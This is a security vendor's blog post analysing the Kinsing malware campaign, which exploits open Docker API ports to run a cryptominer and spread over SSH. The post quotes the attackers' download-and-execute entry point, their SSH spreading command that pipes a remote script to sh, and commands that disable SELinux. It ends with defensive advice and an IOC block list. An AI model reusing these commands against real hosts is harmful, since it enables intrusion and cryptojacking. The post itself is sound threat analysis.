<!doctype html><!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-us" > <![endif]--><!--[if IE 7]>    <html class="no-js lt-ie9 lt-ie8" lang="en-us" >        <![endif]--><!--[if IE 8]>    <html class="no-js lt-ie9" lang="en-us" >               <![endif]--><!--[if gt IE 8]><!--><html class="no-js" lang="en-us"><!--<![endif]--><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="author" content="Gal Singer">
    <meta name="description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta name="generator" content="HubSpot">
    <title>Threat Alert: Kinsing Malware Attacks Targeting Container Environments</title>
    <link rel="shortcut icon" href="https://blog.aquasec.com/hubfs/PNG__2020%20Aqua%20Logomark%20Color.png">
    

    <script src="/hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js"></script>
<script>hsjQuery = window['jQuery'];</script>
    <meta property="og:description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta property="og:title" content="Threat Alert: Kinsing Malware Attacks Targeting Container Environments">
    <meta name="twitter:description" content="An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis">
    <meta name="twitter:title" content="Threat Alert: Kinsing Malware Attacks Targeting Container Environments">

    

    

    <style>
a.cta_button{-moz-box-sizing:content-box !important;-webkit-box-sizing:content-box !important;box-sizing:content-box !important;vertical-align:middle}.hs-breadcrumb-menu{list-style-type:none;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px}.hs-breadcrumb-menu-item{float:left;padding:10px 0px 10px 10px}.hs-breadcrumb-menu-divider:before{content:'›';padding-left:10px}.hs-featured-image-link{border:0}.hs-featured-image{float:right;margin:0 0 20px 20px;max-width:50%}@media (max-width: 568px){.hs-featured-image{float:none;margin:0;width:100%;max-width:100%}}.hs-screen-reader-text{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}
</style>

<link rel="stylesheet" href="/hs/hsstatic/BlogSocialSharingSupport/static-1.16/bundles/project.css">
<link rel="stylesheet" href="/hs/hsstatic/AsyncSupport/static-1.122/sass/rss_post_listing.css">
<link rel="stylesheet" href="/hs/hsstatic/AsyncSupport/static-1.122/sass/comments_listing_asset.css" />
    


    


<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="amphtml" href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability?hs_amp=true">

<meta property="og:image" content="https://blog.aquasec.com/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg#keepProtocol">
<meta property="og:image:width" content="650">
<meta property="og:image:height" content="315">

<meta name="twitter:image" content="https://blog.aquasec.com/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg#keepProtocol">


<meta property="og:url" content="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability">
<meta name="twitter:card" content="summary_large_image">

<link rel="canonical" href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability">
<!-- Google Search consolde tag -->
<meta name="google-site-verification" content="PIrdhYZitmfjtBPSTPmEnlarvsbAf1WzRIpARVTY6D0">
<meta property="og:type" content="article">
<link rel="alternate" type="application/rss+xml" href="https://blog.aquasec.com/rss.xml">
<meta name="twitter:domain" content="blog.aquasec.com">
<meta name="twitter:site" content="@AquaSecTeam">

<meta http-equiv="content-language" content="en-us">
<link rel="stylesheet" href="//cdn2.hubspot.net/hub/7052064/hub_generated/template_assets/1640012778759/hubspot/hubspot_default/shared/responsive/layout.min.css">


<link rel="stylesheet" href="https://blog.aquasec.com/hs-fs/hub/1665891/hub_generated/template_assets/7511165869/1632661467789/Coded_files/Custom/page/Aqua_Theme_2019/aqua_theme_2019_styles.css">




</head>
<body class="blog custom-blog-post-page   hs-content-id-27901722055 hs-blog-post hs-blog-id-3657573699" style="">

<div class="body-container-wrapper">
    <div class="body-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell page-center content-wrapper" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span9 widget-span widget-type-cell blog-content" style="" data-widget-type="cell" data-x="0" data-w="9">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_content " style="" data-widget-type="blog_content" data-x="0" data-w="12">
<div class="custom-blog-post-content">
    <div class="blog-section">
        <div class="blog-post-wrapper cell-wrapper">
                <div class="section post-header">
                  
                  
                  <div class="post-banner-image"><span id="hs_cos_wrapper_post_banner_image" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_linked_image" style="" data-hs-cos-general-type="widget" data-hs-cos-type="linked_image"><img src="https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=650&amp;name=threatAlertViralSpread4-650-315.jpg" class="hs-image-widget " style="width:650px;border-width:0px;border:0px;" width="650" alt="Container security" title="Container security" srcset="https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=325&amp;name=threatAlertViralSpread4-650-315.jpg 325w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=650&amp;name=threatAlertViralSpread4-650-315.jpg 650w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=975&amp;name=threatAlertViralSpread4-650-315.jpg 975w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1300&amp;name=threatAlertViralSpread4-650-315.jpg 1300w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1625&amp;name=threatAlertViralSpread4-650-315.jpg 1625w, https://blog.aquasec.com/hs-fs/hubfs/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg?width=1950&amp;name=threatAlertViralSpread4-650-315.jpg 1950w" sizes="(max-width: 650px) 100vw, 650px"></span></div>
                  
                  
                  <div class="post-date">

                    
                      <a href="/author/gal-singer" class="small-author-profile-link">
                      <div class="small-author-profile  small-author-profile-with-avatar">
                      <div class="small-author-name">Gal Singer</div>
                      </div>
                      </a>
                    
                    
                      
                      April 03, 2020
                      
                   </div>
                  
                    <h1><span id="hs_cos_wrapper_name" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="text">Threat Alert: Kinsing Malware Attacks Targeting Container Environments</span></h1>
      
            </div>
            <div class="section post-body">
                <span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text"><p>Lately we’ve been witnessing a rise in the number of attacks that target container environments. We’ve been tracking an organized attack campaign that targets misconfigured open Docker Daemon API ports. This persistent campaign has been going on for months, with thousands of attempts taking place nearly on a daily basis. These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date.&nbsp;We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.</p>
<p>The following graph shows the volume of attacks by day:</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1211&amp;name=Image%201.jpg" alt="Image 1" width="1211" style="width: 1211px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=606&amp;name=Image%201.jpg 606w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1211&amp;name=Image%201.jpg 1211w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=1817&amp;name=Image%201.jpg 1817w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=2422&amp;name=Image%201.jpg 2422w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=3028&amp;name=Image%201.jpg 3028w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%201.jpg?width=3633&amp;name=Image%201.jpg 3633w" sizes="(max-width: 1211px) 100vw, 1211px"></p>
<p>In this attack, the attackers exploit a misconfigured Docker API port to run an Ubuntu container with the <span style="font-family: 'courier new', courier;">kinsing</span> malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts. Our analysis of this attack vector exposes the techniques used, starting with exploiting the open port, through evasion tactics and lateral movement, all the way up to the end goal of deploying the cryptominer.</p>
<h3>How the Attack is Initiated</h3>
<p>Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point:</p>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;"><span style="font-family: 'courier new', courier;">/bin/bash -c apt-get update &amp;&amp; apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null</span></td>
</tr>
</tbody>
</table>
<p>We saw this entry point in every attack in this campaign, with the only change being the IP address that&nbsp;<span style="font-family: 'courier new', courier;">d.sh</span>&nbsp;is downloaded from. We witnessed 3 IP addresses used in total: the one in the example above, <span style="font-family: 'courier new', courier;">217.12.221.244</span> and <span style="font-family: 'courier new', courier;">185.92.74.42</span>.</p>
<p>The command does the following:</p>
<ul>
<li>Update packages with <span style="font-family: 'courier new', courier;">apt-get update</span></li>
<li>Install wget and cron with <span style="font-family: 'courier new', courier;">apt-get</span></li>
<li>Start the cron service.</li>
<li>Download a shell script with the just installed wget</li>
<li>Run the shell script and read <span>indefinitely from <span style="font-family: 'courier new', courier;">/dev/null</span> to keep the container alive and running</span></li>
</ul>
<p>We can see that the <span style="font-family: 'courier new', courier;">wget</span> program was required to download the cron shell script. The script is later used to gain persistence within the container.</p>
<h3><span style="color: #425a75;">Defense Evasion and Persistence</span></h3>
<p>The shell script <span style="font-family: 'courier new', courier;">d.sh</span>, referred to from here on as ‘the shell script’, contains more than 600 lines. We discovered that the shell script does the following:</p>
<ol>
<li>Disables security measures and clears logs: <span style="font-family: 'courier new', courier; background-color: #ffffff;">echo SELINUX=disabled &gt;/etc/selinux/config</span></li>
<li>Kills numerous applications, notably other malware and cryptominers.</li>
<li>Deletes files related to other malware and cryptominers, most of them from the <span style="font-family: 'courier new', courier; background-color: #ffffff;">/tmp</span> directory</li>
<li>Kills running rival malicious Docker containers and deletes their images.</li>
<li>Downloads the ‘kinsing’ malware and runs it</li>
<li>Uses <span style="font-family: 'courier new', courier;">crontab</span> to download and run the shell script every minute</li>
<li>Looks for other commands running in cron and, if any are identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes (the line quoted here rewrites the crontab without any entry that matches <span style="font-family: 'courier new', courier; background-color: #ffffff;">update.sh</span>):<br><span style="font-family: 'courier new', courier; background-color: #ffffff;">crontab -l | sed '/update.sh/d' | crontab -</span></li>
</ol>
<h3><span style="color: #425a75;">Running the Malware</span></h3>
<p><strong>Kinsing</strong> is a Linux agent, identified by VirusTotal after we submitted it for analysis. From here on we’ll refer to the malware as kinsing.&nbsp;</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1279&amp;name=Image%202.jpg" alt="Image 2" width="1279" style="width: 1279px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=640&amp;name=Image%202.jpg 640w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1279&amp;name=Image%202.jpg 1279w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=1919&amp;name=Image%202.jpg 1919w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=2558&amp;name=Image%202.jpg 2558w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=3198&amp;name=Image%202.jpg 3198w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%202.jpg?width=3837&amp;name=Image%202.jpg 3837w" sizes="(max-width: 1279px) 100vw, 1279px"></p>
<p>A quick look at the malware’s strings reveals that it is a Golang-based Linux agent. It uses several Go libraries, including:</p>
<ul>
<li><strong>go-resty</strong> – an HTTP and REST client library, used to communicate with a Command and Control (C&amp;C) server.</li>
<li><strong>gopsutil</strong> – a process utility library, used for system and process monitoring.</li>
<li><strong>osext</strong> – extension to the standard ‘os’ package, used to execute binaries.</li>
<li><strong>diskv</strong> - A disk-backed key-value store, for storage.</li>
</ul>
<p>Running the malware in a controlled environment and monitoring it brought up more details about its malicious actions.</p>
<h3><span style="color: #425a75;">Communication with C&amp;C servers</span></h3>
<p>Before the malware proceeded to deploy its payload, it attempted to communicate with servers in Eastern Europe. It appears that there are dedicated servers for each function that the malware executes:</p>
<ol>
<li>Attempts to establish a connection with the following IP address: 45.10.88.102. The attempts fail as the server does not respond.</li>
<li>Connects to 91.215.169.111, which appears to be the main C&amp;C server. The malware communicates with that host over HTTP port 80, and sends small encrypted messages at regular intervals, every few seconds.</li>
<li>Connects to 217.12.221.244/spre.sh, which we presume stands for spread, as we will see in the next paragraph, to download a shell script used for lateral movement purposes.</li>
<li>Connects to 193.33.87.219 to download the cryptominer C&amp;C communication.</li>
</ol>
<h3><span style="color: #425a75;">Discovery and Lateral Movement</span></h3>
<p>The <span style="font-family: 'courier new', courier;">spre.sh</span> shell script that the malware downloads is used to laterally spread the malware across the container network.</p>
<p>In order to discover potential targets and locate the information it needs to authenticate against them, the script passively collects data from <span style="font-family: 'courier new', courier;">/.ssh/config</span>, <span style="font-family: 'courier new', courier;">.bash_history</span>, <span style="font-family: 'courier new', courier;">/.ssh/known_hosts, </span>and the like. We did not identify any active scanning techniques used to identify additional targets.</p>
<p>Using the information gathered, the malware then attempts to connect to each host, using every possible user and key combination through SSH, in order to download the aforementioned shell script and run the malware on other hosts or containers in the network.</p>
<p>The actual shell script is named <span style="font-family: 'courier new', courier;">spr.sh</span>&nbsp;this time around, but it is identical to the <span style="font-family: 'courier new', courier;">d.sh</span>&nbsp;shell script used earlier in the attack sequence.</p>
<p>The following SSH command was used to spread it throughout the network:</p>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;"><span style="font-family: 'courier new', courier;">ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://217.12.221.244/spr.sh|sh; sudo wget -q -O - http://217.12.221.244/spr.sh|sh;"</span></td>
</tr>
</tbody>
</table>
<p>We noticed a comment in the script for a 20-second sleep after every 20 SSH connection attempts and their cleanup, possibly indicating that the attackers have some sense of evasion and were trying to hide their activities.</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=850&amp;name=Image%203.jpg" alt="Image 3" width="850" style="width: 850px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=425&amp;name=Image%203.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=850&amp;name=Image%203.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=1275&amp;name=Image%203.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=1700&amp;name=Image%203.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=2125&amp;name=Image%203.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%203.jpg?width=2550&amp;name=Image%203.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></p>
<p style="text-align: center;"><em>Spre.sh script</em></p>
<p>At the last stage of the attack the malware runs a cryptominer called <span style="font-family: 'courier new', courier;">kdevtmpfsi</span>. The cryptominer was identified by VirusTotal as a Bitcoin miner.</p>
<p><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1284&amp;name=Image%204.jpg" alt="Image 4" width="1284" style="width: 1284px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=642&amp;name=Image%204.jpg 642w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1284&amp;name=Image%204.jpg 1284w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=1926&amp;name=Image%204.jpg 1926w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=2568&amp;name=Image%204.jpg 2568w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=3210&amp;name=Image%204.jpg 3210w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/Image%204.jpg?width=3852&amp;name=Image%204.jpg 3852w" sizes="(max-width: 1284px) 100vw, 1284px"></p>
<p>The cryptominer connects to a host with the 193.33.87.219 IP address using a login request over HTTP, receives further instructions, and starts mining cryptocurrency.</p>
<div>The infographic below illustrates the full flow of the attack:</div>
<div><a href="https://cdn2.hubspot.net/hubfs/1665891/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography.png" rel=" noopener"><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=850&amp;name=KinsingMalwareInfography_800.jpg" alt="KinsingMalwareInfography_800" width="850" style="width: 850px;" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=425&amp;name=KinsingMalwareInfography_800.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=850&amp;name=KinsingMalwareInfography_800.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=1275&amp;name=KinsingMalwareInfography_800.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=1700&amp;name=KinsingMalwareInfography_800.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=2125&amp;name=KinsingMalwareInfography_800.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/KinsingMalwareInfography_800.jpg?width=2550&amp;name=KinsingMalwareInfography_800.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></a></div>
<div>&nbsp;</div>
<h3><span style="color: #425a75;">Summary</span></h3>
<p>This attack stands out as yet another example of the growing threat to cloud native environments. With deployments becoming larger and container use on the rise, attackers are upping their game and mounting more ambitious attacks, with an increasing level of sophistication.</p>
<p>Here is a summary of the attack components, mapping each component of the attack to the corresponding <a href="https://attack.mitre.org/" rel="noopener" target="_blank">MITRE ATT&amp;CK</a>&nbsp;tactics and techniques category:</p>
<p><a href="https://cdn2.hubspot.net/hubfs/1665891/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%205%20High%20Res.jpg" rel="noopener" target="_blank"><img src="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=850&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg" width="850" style="width: 850px;" alt="MITREAtta&amp;ck tactics and techniques" srcset="https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=425&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 425w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=850&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 850w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=1275&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 1275w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=1700&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 1700w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=2125&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 2125w, https://blog.aquasec.com/hs-fs/hubfs/4-06%20Threat%20Alert%20Kinsing%20Attack/MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg?width=2550&amp;name=MITRE%20Matrix%20Diagram%20Image%20Scaled%20down%20to%20800x334.jpg 2550w" sizes="(max-width: 850px) 100vw, 850px"></a></p>
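<p>We believe that DevSecOps teams must also up their game and become aware of the threats that are lurking in the cloud, and develop a security strategy to mitigate risks. Because every attack in this campaign starts from a Docker daemon API port left open without authentication, confirming that the daemon API is not reachable from untrusted networks comes before anything else. Here’s a list of steps we’d consider taking:</p>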
<ol>
<li>Identify all cloud resources and group them by some logical structure.</li>
<li>Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege.</li>
<li>Scan the images that you use, making sure you are familiar with them and their use, and run them with minimal privileges, such as avoiding the root user and privileged mode. Use <a href="https://github.com/aquasecurity/trivy" rel="noopener" target="_blank">Trivy, the open source vulnerability scanner</a>.</li>
<li>Investigate logs, mostly around user actions, and look for anomalies: actions you can’t account for.</li>
<li>Form a security strategy where you can <a href="/cloud-native-security-drift-prevention" rel="noopener" target="_blank">enforce your policies</a> with ease, consider using <a href="https://www.aquasec.com/products/aqua-cloud-native-security-platform/" rel="noopener" target="_blank">cloud security tools</a> that will widen your scope and reach within your cloud resources.</li>
</ol>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;">
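<p><span style="color: #ff0201;"><strong>We encourage you to block access to the following IOCs (URLs and IP addresses):</strong></span></p>
<p>Note: the entry <span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.24/d.sh</span> in this list differs by one digit from <span style="font-family: 'courier new', courier; color: #2e3e50;">217.12.221.244</span>, which the analysis names as one of the three hosts that <span style="font-family: 'courier new', courier; color: #2e3e50;">d.sh</span> was downloaded from; verify the address before adding it to a blocklist.</p>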
<p><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/kinsing/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/al.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/cron.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/kinsing</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/ex.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://185.92.74.42/w.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://185.92.74.42/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.24/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/kinsing</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/j.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/t.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/spr.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/spre.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/p.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/Application.jar</span><br><span style="font-family: 'courier new', courier; color: 
#2e3e50;">http://217.12.221.244/f.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.traffclick.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.mechta-dachnika-tut.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.rus-wintrillions-com.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://rus-wintrillions-com.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://stroitelnye-jekologicheskie-materialy2016.ru</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">45.10.88.102</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">91.215.169.111</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">193.33.87.219</span><br><br><span style="font-family: 'courier new', courier; color: #2e3e50;">MD5s:</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - 0d3b26a8c65cf25356399cc5936a7210</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - 6bffa50350be7234071814181277ae79</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - c4be7a3abc9f180d997dbb93937926ad</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kdevtmpfsi - d9011709dd3da2649ed30bf2be52b99e</span></p>
</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p></span>
            </div>
          
          <div id="hubspot-author_data" class="hubspot-editable" data-hubspot-form-id="author_data" data-hubspot-name="Blog Author">
            
               
            
            
            

                
                  <div class="hs-author-profile  hs-author-profile-with-avatar">
                     <div class="hs-author-avatar"> <img src="https://blog.aquasec.com/hubfs/Gal%20Singer.jpg" alt="Picture of Gal Singer"> </div> 
                    <a href="/author/gal-singer"><h4 class="hs-author-name">Gal Singer</h4></a>
                    <div class="hs-author-bio">Gal is a Security Researcher at Aqua. As part of the Aqua research team, his work focuses on researching vulnerabilities in Kubernetes and Networking around the cloud native world. When not at work, he likes going to music concerts and spending time at the beach with his friends.</div>
                    
                    
                  </div>
                  
                

             </div>
          
          
            
                 <p id="hubspot-topic_data">
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/security-threats">Security Threats</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/container-vulnerability">Container Vulnerability</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/cloud-native-security">Cloud Native Security</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/malware-attacks">Malware Attacks</a>
                    
                 </p>
            
        </div>
    </div>
</div>


</div>

</div><!--end row-->
</div><!--end row-wrapper -->


</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end body -->
</div><!--end body wrapper -->

<div class="footer-container-wrapper">
    <div class="footer-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_jinja " style="" data-widget-type="raw_jinja" data-x="0" data-w="12">
<script type="application/ld+json">
 {
     "@context": "http://schema.org",
     "@type": "BlogPosting",
